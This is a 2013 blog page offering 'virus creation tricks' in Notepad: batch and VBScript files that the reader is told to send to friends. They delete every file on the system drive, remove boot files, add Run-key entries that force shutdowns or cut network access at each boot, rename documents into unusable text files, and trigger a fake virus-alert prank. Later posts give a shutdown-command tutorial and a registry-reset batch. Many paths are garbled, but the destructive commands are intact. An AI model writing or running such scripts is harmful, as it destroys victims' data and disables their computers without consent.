Sunday 22 September 2013

VIRUS CREATION TIPS USING NOTEPAD

virus creation trick 1.

Just open the Notepad and type the paste the following Code.

set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”


Now Save This Notepad file With shashank.vbs Extension . 

2 -> Virus Creation Trick  2 .

Open Notepad and write "start" without quotes 
Start
Start
Start 

and then save it with shan.bat extension. 
Now double click on this .bat file to run Command Prompt.

 3 -> Virus Creation Trick 3 

Convey your friend a little message and shut down his / her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
 

Save it as "Anything.BAT" in All Files and send it. 

4 -> Virus Creation Trick 4 

Toggle your friend's Caps Lock button simultaneously:
Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "shashank.VBS" and send it. 


5 -> Virus Creation Trick 5 

Frustrate your friend by making this VBScript hit Enter simultaneously:Type :

Code:

Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "shashank.VBS" and send it.
   


6 -> Virus Creation Trick 6  

This Virus Deletes All The Content Of A Drive... 

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As shashank.bat 




7 -> Virus Creation Trick 7


This Will Crash Ur Computer 
Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As shan.vbs 
 

 8 -> Virus Creation Trick 8

The Most Simple Virus To Crush The Window
It Only Works With Windows XP

@Echo off
Del C: *.* |y
 
Save It As shan.bat 


 9 -> Virus Creation Trick 9

Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

Save As shan.bat File In Notepad!!This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!


10 -> Virus Creation Trick 10


Shutdowns Computer Everytime It Is Turned On
Save As A bat File
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE


11 -> Virus Creation Trick 11


Disable Internet Permanently
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save As A bat File
 

  
12 -> Virus Creation Trick 12 

Change Files To Non-working TXT Files
Save As A bat File

REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

  

13 -> Virus Creation Trick 13 

System Meltdown totally crashed

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE

Save As A shan.bat File

Thursday 19 September 2013

Shutdown Your Computer or a Remote PC via Command Prompt


Most of us shutdown our computers using the power button given in the Start menu. Some of us use the physical power button on our machines. Very few people actually use other means of shutting down a computer and even less is the number of people who use the command prompt to shutdown a computer.

A reason for this is that most of us don't know that the command prompt can be used to not only shutdown, restart or log off our computer instantly but also to shutdown a remote computer provided you have administrative access. It can also be used to hibernate a computer and give a comment containing the reason for shutdown. This post will show you how to do all this.

Shutdown computer with command prompt
Required
A computer running Windows (XP, Vista, 7 or 8) with the command prompt working perfectly, i.e. not disabled by a virus.

Initial Steps 
1) Press Windows Key + R.
2) Enter CMD and press Enter.

This will start the command prompt. Follow the instructions below depending on what you want to do.

Shutdown Local Machine (Your Computer)
Type "shutdown -s" without the quotes in the command prompt and press Enter. Shutdown is the command being executed and the switch -s tells the computer to shutdown.

Restart your Local Computer 
Type "shutdown -r" in the command prompt and press Enter. In this case, the command switch -r is telling the computer to restart after shutdown.

Log Off the Current User
Type "shutdown -l" in the command prompt and press Enter. The -l command switch tells the computer to log off.

Shutdown a Remote Computer
Type "shutdown -s -m \\name of the computer" in the command prompt and press Enter. Replace \\name of the computer with the actual name of the remote computer you are trying to shutdown. As mentioned earlier, you must have administrative access to the computer you are trying to shutdown. To know if you have administrative access, press Windows key + R and then type the name of the computer and press Enter.

Note: If you don't remember the name of the remote computer, you can look for it by opening a list of all the computers you are connected to by executing "net view" in command prompt.

If you can connect to the computer, you will be asked to login with your username and password. Upon entering them, a window will display the list of all the directories available to you. This should help you know whether you can or cannot shutdown the remote computer.

Hibernate a Local Computer
Type in "Rundll32.exe Powrprof.dll,SetSuspendState" without the quotes and press Enter. Your computer should hibernate, if it does not, then you must enable hibernation to do this.

Shutdown your or a remote computer after a specific time
Type "shutdown -s -t 60" to shutdown your computer after 60 seconds. Upon executing this, a countdown timer displaying a warning message will be shown. This command uses the -t command switch followed by a variable (which is 60 in this case) which represents the number of seconds after which the computer will shutdown.

Display a Message containing the reason for shutdown
Type shutdown -s  -t 500 -c "I am tired. I don't want to work anymore." (with the quotes) in the Command Prompt and press Enter. The -c switch is used in the code to give the reason for shutting down and what is followed in quotes will be displayed in the dialog box as the reason. This can be used to display all sorts of funny messages. One example :-

Skynet has become self aware. John Connor did not stop me. You can not use your PC anymore.

Stop a System Shutdown
Type "shutdown -a" and press Enter. This will stop the system from shutting down if the countdown to shut down has not reached 0.

Longest And Most Complex Fake Hack -Notepad Trick


@echo off
title WARNING!!! VIRUS DETECTED!
set input=
set /p input=A virus has been found on your computer. To delete it, press D, to ignore this alert, press i.
if %input%==d goto d
if %input%==i goto i
echo waiting for response…
ping localhost -n 1 >nul
echo waiting for response……
ping localhost -n 1 >nul
:i
start
start mspaint
start mspaint
start mspaint
start mspaint
start mspaint
start mspaint
start mspaint
start mspaint
start mspaint
start mspaint
start mspaint
start mspaint
start cmd
start mspaint
:d
set input=
set /p input=Please choose one of the three options. 1. Delete the virus. 2. Send to quarantine using your default AntiVirus. 3. Send a virus notification to Windows.
if %input%==1 goto 1
if %input%==2 goto 2
if %input%==3 goto 3
:1
echo loading…
ping localhost -n 1 >nul
cls
echo loading……
ping localhost -n 1 >nul
cls
start shutdown -s -t 180 -c “Please Restart your Computer for the function to work and run this program again, selecting the second option.
:2
echo accesing quarantine…
ping localcost -n 5 >nul
echo accesing quarantine……
ping localcost -n 5 >nul
echo accesing quarantine…
ping localcost -n 5 >nul
echo accesing quarantine……
ping localcost -n 5 >nul
echo accesing quarantine…
ping localcost -n 5 >nul
echo accesing quarantine……
ping localcost -n 5 >nul
start shutdown -s -t 150 -c “The system has had to shut down due to a fatal error concerning the virus in your computer. All unsaved data will be lost”
:3
echo Sending virus notifier…
ping localhost -n 3 >nul
cls
echo Sending virus notifier……
ping localhost -n 3 >nul
cls
echo Sending virus notifier…
ping localhost -n 3 >nul
cls
echo Sending virus notifier……
ping localhost -n 3 >nul
cls
echo Sending virus notifier…
ping localhost -n 3 >nul
cls
echo Sending virus notifier……
ping localhost -n 3 >nul
cls
echo Sending virus notifier…
ping localhost -n 3 >nul
cls
echo Sending virus notifier……
ping localhost -n 3 >nul
cls
set input=
set /p input=sending the file could take some time. Do you want to proceed? Y/N
if %input%==y goto y
if %input%==n goto n
:y
echo Connecting internet server…please wait
ping localhost -n 3 >nul
cls
echo Connecting internet server….please wait
ping localhost -n 3 >nul
cls
echo Connecting internet server…..please wait
ping localhost -n 3 >nul
cls
echo Connecting internet server……please wait
ping localhost -n 3 >nul
cls
echo Connected
ping localhost -n 3 >nul
cls
echo Accesing e-mail notifier software…
ping localhost -n 3 >nul
cls
echo Accesing e-mail notifier software……
ping localhost -n 3 >nul
cls
echo Accesing e-mail notifier software…
ping localhost -n 3 >nul
cls
echo Accesing e-mail notifier software……
ping localhost -n 3 >nul
cls
echo E-mail software accesed
ping localhost -n 3 >nul
cls
echo Sending e-mail and software notes…
ping localhost -n 3 >nul
cls
echo Sending e-mail and software notes……
ping localhost -n 3 >nul
cls
echo Sending e-mail and software notes…
ping localhost -n 3 >nul
cls
echo Sending e-mail and software notes……
ping localhost -n 3 >nul
cls
echo Software sended
ping localhost -n 3 >nul
cls
echo All actions proceeded completely
ping localhost -n 3 >nul
:n
shutdown -s -t 30 -c “iam freaking tired of this iam just shutting down the computer and running the virus!!!!”

3.Now go to file and click on save as
4.Give name with extention as .bat for eg:- trick.bat
5.Now go and click on it ………ENJOY

Saturday 14 September 2013

REMOVE DESKTOP MISSING FILE MESSAGE PERMANENTLY

When u start my computer, u get an error message saying that "VirusRemoval.vbs" or some thing (any file) missing. How can i remove this one. 


just open your Notepad and type the below code and save it as shashank.bat and put it in your desktop and run it.
note :-put ur file that missing i put it VirusRemoval.vbs with extension in 2nd line

code below 

cd\ del /a /f /s VirusRemoval.vbs 
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /f /d "%windir%\system32\userinit.exe", reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f /d "explorer.exe" reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v Hidden /f /d 00000002 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v ShowSuperHidden /f /d 00000001 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v SuperHidden /f /d 00000000 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN" /t Reg_dword /v CheckedValue /f /d 00000002 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN" /t Reg_dword /v DefaultValue /f /d 00000002 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /t Reg_dword /v CheckedValue /f /d 00000001 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /t Reg_dword /v DefaultValue /f /d 00000002 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v CheckedValue /f /d 00000000 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v DefaultValue /f /d 00000000 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v UncheckedValue /f /d 00000001 reg add "HKLM\Software\Policies\Microsoft\Windows\Installer" /t Reg_dword /v DisableMSI /f /d 0 reg add "HKCU\Software\Policies\Microsoft\Windows\System" /t Reg_dword /v DisableCMD /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableCMD /f /d 0 reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /t Reg_dword /v DisableConfig /f /d 0 reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /t Reg_dword /v DisableSR /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_Binary /v NoDriveAutoRun /f /d ffffff03 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoDriveTypeAutoRun /f /d 36 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFolderOptions /f /d 0 reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFolderOptions /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoRun /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFind /f /d 0 reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFind /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\UnreadMail" /t Reg_dword /v MessageExpiryDays /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /f /d 0 reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableTaskMgr /f /d 0 reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableTaskMgr /f /d 0